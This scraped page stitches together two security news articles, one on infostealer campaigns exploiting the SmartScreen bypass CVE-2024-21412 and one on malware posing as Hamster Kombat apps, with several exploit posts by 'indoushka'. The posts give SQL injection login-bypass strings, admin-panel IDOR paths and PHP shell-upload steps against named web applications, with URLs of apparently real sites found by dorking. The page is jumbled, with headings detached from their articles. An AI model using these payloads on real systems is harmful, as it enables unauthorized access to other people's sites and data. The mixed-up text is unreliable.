Although there was a decrease in BEC engagements from last quarter, it was still a major threat for the second quarter in a row.

IR Trends: Ransomware on the rise, while technology becomes most targeted sector

The good news: Only organizations far behind on standard Windows patching have anything to worry about.

Source: dennizn via Alamy Stock Photo

A Microsoft Defender SmartScreen vulnerability that was patched in February is still being used in infostealing attacks across the globe.

CVE-2024-21412 — a "high" severity, 8.1 CVSS-scored security bypass bug in SmartScreen — was first disclosed and fixed on Feb. 13. Since then, it has been used in campaigns involving well-known infostealers like Lumma Stealer, Water Hydra, and DarkGate.

Now, five months later, Fortinet has flagged yet another campaign involving two more stealers: Meduza and ACR. Attacks thus far have reached the US, Spain, and Thailand.

Sometimes, organizations take their time updating third-party software. By contrast, "The attackers in this case are taking advantage of software that's native on Microsoft Windows, which would be updated in normal Microsoft patch cycles," notes Aamir Lakhani, global security strategist and researcher at Fortinet. "It's a little unclear and concerning when these vulnerabilities are not patched, because it could indicate there are other Microsoft vulnerabilities that are not being patched as well."

**A CVE-2024-21412 Attack Chain**

If you visit a website, or download a file or program that's known to be unsafe — or is suspicious for any number of other reasons — SmartScreen will step in and present you with that famous blue screen message: "Windows protected your PC." It's a simple, effective way to alert users to potentially dangerous cyber threats.

So consider how useful it would be to an attacker if they could simply disable that notification. This is what CVE-2024-21412 allows them to do.

In the latest campaign identified by Fortinet, the attackers are beating SmartScreen "through the combination of PowerShell trickery and hiding attacks in images and taking advantage of how those images are processed," Lakhani explains.

First, they lure victims with a URL that triggers the download of a shortcut (LNK) file. The LNK downloads an executable with an HTML Application (HTA) script with PowerShell code for retrieving decoy PDF files and malicious code injectors.

One of the injectors is more interesting than the other. After running anti-debugging checks, it downloads a JPG image file, then uses a Windows API to access its pixels and decode its bytes, wherein lies malicious code.

"These types of image-based attacks have been around a long time and, while they aren't as common as other types of attacks we typically observe, we still see them pop up over time because they are quite effective," Lakhani notes. "It's not surprising to see this attack, especially because \[steganography\] detection is often overlooked compared to other attack scenarios."

**Consequences to the Unpatched**

The stealers smuggled in through image files in this case get planted inside of legitimate Windows processes, at which point the gathering and exfiltration of data begins.

The kinds of information they aim for are broad. ACR, for example, steals from dozens of browsers (Google Chrome, Firefox), dozens of crypto wallets (Binance, Ledger Live), messenger apps (Telegram, WhatsApp), password managers (Bitwarden, 1Password), virtual private network (VPN) apps, email clients, file transfer protocol (FTP) clients, and more. 

Only organizations far behind on standard Windows patching have anything to worry about. Clearly, though, those organizations are out there.

"I would understand how individual software updates from smaller companies may be missed, but most organizations have regular Microsoft software patch updates, and this particular vulnerability remains open to attack," Lakhani says. To encourage better patching practices, he adds, "I think in all cases, software vendors need to give users alerts and notifications that critical security patches exist and should be installed when the software is launched or used."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Cyberattackers Exploit Microsoft SmartScreen Bug in Stealer Campaign

Players can only access the game by first joining its Telegram channel, with some going astray in copycat channels with hidden malware.

Source: Science Photo Library via Alamy Stock Photo

Malicious actors are targeting users of a mobile currency game by using fake Android and Windows software that installs spyware and other malware.

Hamster Kombat launched in March and already has more than 250 million users, likely due to the promises of winning TON-based cryptocurrency. The game is for Android users, who can earn in-game currency by completing certain tasks within the game.

To play, users must join the game's Telegram channel, scan a QR code, and then launch a Web app on their device. When users first search for the game's Telegram channel, they are likely to come across other Hamster-branded channels attempting to distribute Android malware. One channel, named "HAMSTER EASY," even distributes Ratel Android spyware as an APK file.

This malware can allow the threat actors to subscribe the victim to different services and hide the notifications so that they remain unaware.

Other fake websites include "hamsterkombat-ua.pro" and "hamsterkombat-win.pro," which redirect visitors to advertisements to generate money instead of the real game. 

On the Windows platform, researchers discovered GitHub repositories that promise its victims Hamster Kombat farm bots and autoclickers but instead deliver cryptors that contain Lumma Stealer, info-stealer malware.

As the game continues to grow in popularity among users, it will continue to attract malicious actors, so users should be wary of being tricked by threat actors and copycat apps and remain vigilant when downloading software.

**About the Author(s)**

Hamster Kombat Players Threatened by Spyware &amp; Infostealers

SIM Wisuda version 1.0 suffers from an insecure direct object reference vulnerability.

**SIM Wisuda 1.0 Insecure Direct Object Reference**

Posted Jul 24, 2024

Authored by indoushka

SIM Wisuda version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 7fed84c74a95aca63927ebf377895e9a07606b145886012809d45f932101a348

Download | Favorite | View

**SIM Wisuda 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : SIM Wisuda v1.0 IDOR Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://academic.uii.ac.id/wisuda/                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /login/apps/?menu=Lulusan[+] https://www/127.0.0.1/wisuda.uika-bogor.ac.id/login/apps/?menu=LulusanGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,109)
*   Arbitrary (16,828)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,779)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,997)
*   Encryption (2,389)
*   Exploit (53,065)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,167)
*   Local (14,774)
*   Magazine (586)
*   Overflow (13,149)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,613)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,271)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,588)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,900)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,505)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,383)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,686)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

SIM Wisuda 1.0 Insecure Direct Object Reference

SLiMS CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : SLiMS CMS v2.0 Sql injection Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://slims.web.id/web/news/slims-competition-plugin-and-template/                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : "index.php?p=show_detail&id=471"<===== inject here[+] https://www/127.0.0.1/libman1blitarschid/index.php?p=show_detail&id=471Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

SLiMS CMS 2.0 SQL Injection

StarTask CRM version 1.9 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : StarTask CRM v1.9 Auth by Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits)                                                   || # Vendor    : http://p30vel.ir.domains.blog.ir/                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer&Pass : 1' or 1=1 -- -[+] https://www/127.0.0.1/rkexpress.in/dash.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

StarTask CRM 1.9 SQL Injection

UBM CMS version 1.2 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : UBM CMS v1.2 IDOR Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits)                                                   || # Vendor    : https://ubminfotech.com/                                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /admin/header.php [+] https://www/127.0.0.1/orrerydrugs.com/admin/header.php [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

UBM CMS 1.2 Insecure Direct Object Reference

TAIF LMS version 5.8.0 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : TAIF LMS v5.8.0 shell upload Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://lmsv3.mmgulf.com/public/                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] TAIF learning script contain arbitrary file upload[+] registered user can upload .php files in profile picture section without any security[+] profile link : localhost/demo/public/profile/show/[+] profile link : /demo/public/profile/show/[+] edit profile photo and upload php files and inspect element your php direction[+] uploaded file direction :local host /demo/public/images/user_img/16067501901.php <---- random id[+] just right click the photo and use inspect element you will have your directionGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

TAIF LMS 5.8.0 Shell Upload

Vencorp version 2.1.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Vencorp v 2.1.1 Auth by Pass Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://themeforest.net/item/elegant-responsive-html5-w-animated-metro-slider/5440458?ref=Venmond                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = 'or''='@gmail.com pass = 'or''='[+] https://www/127.0.0.1/venmondcom/demo/vendroid/Greetings to :=================================================jericho * Larry W. Cashdollar *LiquidWorm * Hussin-X * D4NB4R |===============================================================

Vencorp 2.1.1 SQL Injection

Webdenim AppUI version 1.0 suffers from an insecure direct object reference vulnerability.

**Webdenim AppUI 1.0 Insecure Direct Object Reference**

Posted Jul 24, 2024

Authored by indoushka

Webdenim AppUI version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 3418251e6b23a29fe38369d103a67d4c4c7e084f78a767a8b4660ce397493457

Download | Favorite | View

**Webdenim AppUI 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Webdenim AppUI v1.0 IDOR Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codentheme.com/item/appui-free-responsive-html-vuejs-angularjs-admin-dashboard/                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : //admin/header.php[+] https://www/127.0.0.1/listandrelaxcom/admin/header.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,109)
*   Arbitrary (16,828)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,779)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,997)
*   Encryption (2,389)
*   Exploit (53,065)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,167)
*   Local (14,774)
*   Magazine (586)
*   Overflow (13,149)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,613)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,271)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,588)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,900)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,505)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,383)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,686)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Tag

#windows